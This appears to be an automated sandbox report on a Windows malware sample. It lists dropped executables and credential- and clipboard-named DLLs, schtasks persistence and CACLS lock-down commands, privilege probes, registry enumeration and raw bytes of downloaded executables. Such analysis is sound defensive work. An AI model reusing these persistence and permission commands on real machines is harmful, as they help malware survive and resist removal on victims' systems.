file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (17 events)

file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\n9579444.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\y3346153.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\i6882480.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y3022941.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\k9205098.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\n4210104.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\k3948274.exe
file	C:\Users\test22\AppData\Local\Temp\1000010051\foto175.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\g6030268.exe
file	C:\Users\test22\AppData\Local\Temp\1000012051\du.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\x6385145.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\l4326779.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\l4090866.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\f4388758.exe
file	C:\Users\test22\AppData\Local\Temp\1000011051\fotod45.exe

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F

Drops a binary and executes it (3 events)

file	C:\Users\test22\AppData\Local\Temp\1000010051\foto175.exe
file	C:\Users\test22\AppData\Local\Temp\1000011051\fotod45.exe
file	C:\Users\test22\AppData\Local\Temp\1000012051\du.exe

Drops an executable to the user AppData folder (10 events)

file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\1000010051\foto175.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\y3346153.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\i6882480.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y3022941.exe
file	C:\Users\test22\AppData\Local\Temp\1000011051\fotod45.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\f4388758.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\x6385145.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\n9579444.exe
file	C:\Users\test22\AppData\Local\Temp\1000012051\du.exe

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
ShellExecuteExW July 10, 2023, 6:12 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe	1	1
ShellExecuteExW July 10, 2023, 6:12 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW July 10, 2023, 6:12 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y\|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW July 10, 2023, 6:13 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000010051\foto175.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000010051\foto175.exe	1	1
ShellExecuteExW July 10, 2023, 6:13 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000011051\fotod45.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000011051\fotod45.exe	1	1
ShellExecuteExW July 10, 2023, 6:13 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000012051\du.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000012051\du.exe	1	1
ShellExecuteExW July 10, 2023, 6:13 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 10, 2023, 6:13 p.m.	process_identifier: 452 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 139264 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x003a2000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process danke.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile July 10, 2023, 6:13 p.m.	buffer: MZÿÿ@@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL²dàHvD2@õ.textytv àe\|³P^¡¿jV%ý}ÕG YJ%¹ÓªüB Ï¸"7ôàÀðT·TëÕ1xjÕ$!ÌI7#G«7qa`öGÓ¤ÂÂ¤_ª¦ÎÀDn\Ä¢oÔ¯°×x^=ÑöàÝ4v¥,¬û¿ð3æÀçyÇÍ:½~Oð¬[·&°L~í[8i,5D¦rövÎ'j>ï@ÃÑÄéæÍ°×²ÚLR~Æm=Oª°hÁÞgÈHè°³¯¶å}0§ø`¾â ×~A?ZìP»b1 f,óë.éÊ¬RºUµS¤g ðÞófò_ïøÛB'³wU}+Öï#ú×=,ÉÝÔ¡vÚËÍK_#ý¡wE&ÙÚÖ]DÔïC©#å¤mµO´7À=îv!¹çÏÁa"-GH©Ô3&ûVxê±wÐóg¾¢%ÑMJ£ËLöÏ²1#0\|Cyãvt-ÆÔ øý$Kx`è$Á»#8§ Q¯ «V d#Äèé{fÃå' üÒnÜtu(rì<$tuFáqVèutÃs4$Äë ÄîÍë¢ëõÄ¢ëÀó±ñÆë XV_ërëø«¬ë²ñ0ÐªâóutÔÓÆ4$ÄutËBÎÄ\|$üÃUåVWëB1Ohn$Äë\Cëïëqüj`YëAë÷_ëãië¶ëº(ëa×ëõ:èCÿÿÿ+ £e$£] ¡ßyéÁøÊÒq«É+\.øÊÒÃ:ìÏ@F:((£,«ì,Ã-<AÃÇÓÃ"xWbBHqÃ-é4ÃßNÃ%_wY1(((Ã-·ÃÝÀËÖ××_^ÉÂUåUSVWëÑ2.¸!ëdëõë_GKh$ÄëVëïë\|w×.j2$ÄëëòÊèþÿÿg¹G:¹O>éÌõßò=âòÚ11G Ú·2222ú G56 A0T£ÁÄðòJ+£G8²ÈÚd222Ù:ÌþÄðF/ÌþÙ+H<²È´ÒÚ2220Ù4ÄðG7´Ò§ 560;G&Ú2222úG;6A6FT£¤=ß¿F2Á¤ÛDÍÍÍÇâêÚ5222:úâòÓñÄíK1¡¡6àù=ëñoO>Ù?Ø¶Z!22jÙ7#ÙÆßÙ&T{x8Z2322¹>±ö6Ù7ý>ÙÝ;Ù#a±X¹&±ö6Ù7pFÙÀ´Ú¢ÏÍÍø_^[]ÉÂUåìSVWë orG£¸tëgëõë;àÆ@sh YëSíëô·ë ô÷üºëð5ëõ¹è=ýÿÿ^2ÃF÷Nv~TUTUëþüü®VûVÿF÷2Êik3QRSiüüPÃvüv÷Uëýüü8FûvNèÄF÷]\TUëQþüüèµ2Õ¢Ækw[èv©è÷¦èKúk£ZèÎÆè÷Åè_c ¹èîèö8ëÿüüEô_^[ÉÂUåì`SVWë ´ÎPì¸këWëõâëãÆø¿Eh$Äë\Òëïëé7ðZhZë:ÞëôèFüÿÿÙµ{ ùHâlâDð{ÁH{×ÌD¤ Á ñ$ ºÒÔ{×ÈD ÉT ý ñ\îÒ{×C v ÉT ÁtÕÖîÄÔ{×ôD\ ÁpîÓÓÔî{î{{ñt{D? ù\| Á4 üCÔ ñ(ÓìîÔÓîÒ{×ðDñÞ{ñ4ÁL Á8 ¼ ÉLîÓîÕÓÓÓÔî{{²{×üDñ³ Á@ ¼ ÉLîÓîÕÓÓÓÔ{ñp{²{×üDññ8ìÒÓ{×¤Á {Á\| Á4ÉE ü ñ,ÓìîÄÔÓîÒ{×ðDù\|{ñ4ÁL Á< ¼ ÉLîÓîÕÓÓÓÔî{{²{×üDZ ÁD ¼ ÉLî¤ÓîÕÓÓÓÔ{ñp{²{×üD8lñðT@@ð xojtooqo3uBöÒo\|PVÂì© @o½pok8oíMÒKsyìä¦ÞoxopQo3£ícöÖÜo}o\|Òo3EfoÀá3uFoÈè3uµDo!=(oÈú3uFof@o3uvËcGoPoo}ñ²3ÊÒ vùHðFoF\|ÕÎMðþù<öñw F¬Ýf`ÚùHðâlÛka } ~EM«F \|M«ì)Ôl~{{ÁD uÑ<· } ~E´Fº Â¬ÁDÉ@Ñp·oåÒÒ°¯ÑD 2$²ñ<ºð¬ºÊmUmBµDâ)-´ð¡{Á<\|fcoWÚÊ¬ÉDµ{ Áx ¼ÓÔ{ñ@ÕÓÓÓÓÓ{ñp{oìl{×mLx{{o×ö~ÄìïÜoü]op[oãì @oJok!o¬s#¦þì @oVokÛl5\|{{_^[ÉÂUåìSVWëÅ'KhZ$Äëê¾ëïë<iC·jw$Äë6ëòë7MÄhÇ$ÄëUÏëïxèWøÿÿLÏ¯OÔÇÇ8ÛJ;8²×8²Ë/q=88B³Ê8²Ó8²;/_<88Ç88Ô,Ó"¦°´z¯ÞÇÇLÃãDÃ,Â,(¤,Éê É~°ÇÇÇ,Â\,2ª,È`{¯ÇÇÇ,ÂÓ(,3Ó/'088_^[ÉÂUåìTSVWëRkh"$Äëa.ëïëiqt¹Üë6ëõOëj·"jZëº@ë÷ñè÷ÿÿEðmlåÞkFóö2ó0óí0óPQ¢éÞjNó\¾Q·Âpã5AóPFóìUóþ:px:<ÜóRó÷óWÃJ<Üóqßóë/óþÙúó¢éÚó¾¢é)Øó ô´ó¨¢éÚóúÚóØÚ¢éêWÿÛóÔ1ÌóóáÔ¨ãççNrrççKDØÔ´ãçç¥¬ãççHrOrç.çKxØµg8¸¤åççpNrçK8ð*hjw{}kk8{ytt8{j}yl}8:=k:@NHOçKHÜmÜr$NçKß$ðjmvyk@^ðouq{@^fçK\^NçKpØlàrrççó [wàÄp:<Üó¡ùó÷:ó$/Û6úpÄAó¬óìóJ®µ¢r<ÜóÜóêÊð«íçç_^[ÉÂUåSVWë0Ü¼ÈhW$Äë^¬ëïÑëÆ-³¤j`$Äëìfëò½ëÄ¯íh¶$ÄëÎëïwèZõÿÿ=ë¾=Ãº3@Â¯v?AÐÐ3vÂ¸æI%¶¶¶5r²Ð]]]¹jËÞáª¶¶î]³8]B\]¸È¬Ö¶¶¶]³¤]C8]ºÎ¶¶¶]³uT]Cñ^LBII_^[ÉÂUåìSVWë0?¸h $Äë,ÞëïëxwJÑû¼hÖYëwMëôïëJ5óðºëËëõ¸è¤ôÿÿU×nÏ£RçeÅô?ôRæÂm:Vô9yyzÕã÷ÿçäûàæûýäÿåóà÷äðýêê÷üÌÍ¬æÄÅm2VRçTyuyU×nyø¼ÎúÊy²ÔyfWy`VF8Ï+DyÚygy¿óð·V(yÎúygaz\ammEü_^[ÉÂUåìSVWë'f+h= request_handle: 0x00cc000c	1	1	0
InternetReadFile July 10, 2023, 6:13 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPELê¦dà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0006fc00', u'virtual_address': u'0x00016000', u'entropy': 7.787810840349455, u'name': u'.data', u'virtual_size': u'0x00070524'}

entropy

7.78781084035

description

A section with a high entropy has been found

entropy

0.847393364929

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW July 10, 2023, 6:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 10, 2023, 6:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 10, 2023, 6:13 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW July 10, 2023, 6:13 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Queries for potentially installed applications (50 out of 78 events)

Time & API	Arguments	Status
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000003e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: AddressBook base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: Connection Manager base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: DirectDrawEx base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: EditPlus base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: ENTERPRISE base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: Fontcore base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: Google Chrome base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: IE40 base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: IE4Data base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: IE5BAKEX base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: IEData base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: MobileOptionPack base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: SchedulingAgent base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: WIC base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW July 10, 2023, 6:10 p.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000003e4 key_handle: 0x000003ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
